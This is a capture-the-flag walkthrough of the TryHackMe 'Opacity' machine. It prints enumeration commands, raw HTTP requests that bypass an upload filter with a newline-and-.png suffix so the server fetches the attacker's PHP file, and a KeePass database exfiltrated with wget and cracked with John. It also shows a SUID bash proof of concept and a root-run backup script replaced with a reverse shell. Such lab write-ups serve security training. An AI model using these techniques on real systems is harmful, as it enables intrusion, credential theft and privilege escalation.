Opacity (THM)

Penthos
5 min readApr 17, 2023

--

A quick writeup/walkthrough for opacity at thm

We start off with a quick scan (enumeration phase) with Nmap.

Nmap shows us a few ports open.

PORT    STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Let's take a look at port 80 to start (my favorite port to start on!)

It seems to be a login page, trying default creds got me nowhere fast!

After playing with the login for a while, I realized it was not working, so started back on the enumeration phase with FFUF.

ffuf -u http://10.10.121.172/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fc 404,403 -ic -c 

The FFUF scan returned only one endpoint for me “/cloud”. Let’s have a look at the endpoint to see what's there.

The webpage shows us a file upload for Personal Cloud storage. Testing the upload feature, it seems to take only an image file.

Testing more I discovered that I could call a file from my PC after hosting it with python3.

python3 -m http.server 8084

I gave the request endpoint my IP and port to test if I can get a callback.

POST /cloud/ HTTP/1.1
Host: 10.10.191.23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://10.10.191.23
Connection: close
Referer: http://10.10.191.23/cloud/
Cookie: PHPSESSID=f2p80fi5tgqmcas14pgcjdb5bs
Upgrade-Insecure-Requests: 1

url=http://10.9.13.85:8084/test.php

This failed due to the extension. The application would only take .png,.jpg, and .gif. This had me stuck for a few minutes until I read over a few payloads on https://book.hacktricks.xyz/pentesting-web/file-upload

After testing a few payloads I found that %0a .png would allow me to bypass the image filter.
Now the request looked like this.

POST /cloud/ HTTP/1.1
Host: 10.10.191.23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://10.10.191.23
Connection: close
Referer: http://10.10.191.23/cloud/
Cookie: PHPSESSID=f2p80fi5tgqmcas14pgcjdb5bs
Upgrade-Insecure-Requests: 1

url=http://10.9.13.85:8084/test.php%0a.png

I could now get a file onto the server and a PHP file (reverse shell incoming!)

Below we can see the image was accepted and loaded. Notice the error image as we supplied PHP data and not Image data.

Now I could replace my test.php with a real PHP reverse shell. I used the standard Pentest monkey PHP reverse shell (which can be found on revshells.com). I replaced the test.php file and again sent the new file to the server.

When the file was uploaded I could then call the image from the image directory on the server to call my reverse shell back to me.

Now we have access to the box.

# Escualtion time!

Now we are on the box its time to start enumeration phase 2.

Looking around the system I found a file called dataset.kdbx after some research this turned out to be a KeePass database file for the password manager. We should be able to crack the password to the database. Let's try!

Copy the file to your machine.

# Serve the file on the hacked box so we can get the file. 
python3 -m http.server 9092

# Then get the file to your attacker box
wget 10.10.191.23:9092/dataset.kdbx

After we have the file we can use John to convert the .kdbx to a hash we can crack.

keepass2john dataset.kdbx > dataset.hash
john dataset.hash --wordlist=/usr/share/wordlists/rockyou.txt

Then we get the password! (nice)

After you have the password you can load up KeePass Manager to view the data.

# Install keepass2
sudo apt install keepass2

Now you can run the KeePass program and give it the database file which you can now unlock with the password you cracked just now.

With this password, we can now log in via ssh to the sysadmin account.

# Root

Root was relatively easy on this machine. In the user folder were a few scripts.

The file backup.inc.php stuck out to me as being the odd one out due to the date being different from the rest. I tried to edit the file but did not have permission.

As we can see there were no permissions to edit the file.

Tho if we check the folder above we can see that my user sysadmin has permission on the folder. This means we can’t write to the file but we could replace it entirely! Let's test that!!

For testing i usually make a small POC, ie:

# Normal poc for quick test. 
cp /bin/bash /tmp/b
chmod u+s /tmp/b

# After this I can cd /tmp/b and run a root shell with.
./b -p
(root)#

This time I opted for another PHP reverse shell. The same as before (pentest monkeys).

rm scripts/lib/backup.inc.php
# Now add your shell (make in the user folder of sysadmin)
nano backup.inc.php
# copy and paste your reverse shell code into the file.
# Now copy the file to libs folder.
cp backup.inc.php /home/sysadmin/scripts/lib/backup.inc.php

After this is done we wait.

There is a backup script running every few minutes. Wait for a few minutes to get your reverse shell for root!

Now you have full system access, grab your last flag, retire the box, and give yourself a pat on the back!

Hope you enjoyed the box!

--

--

Penthos
Penthos

No responses yet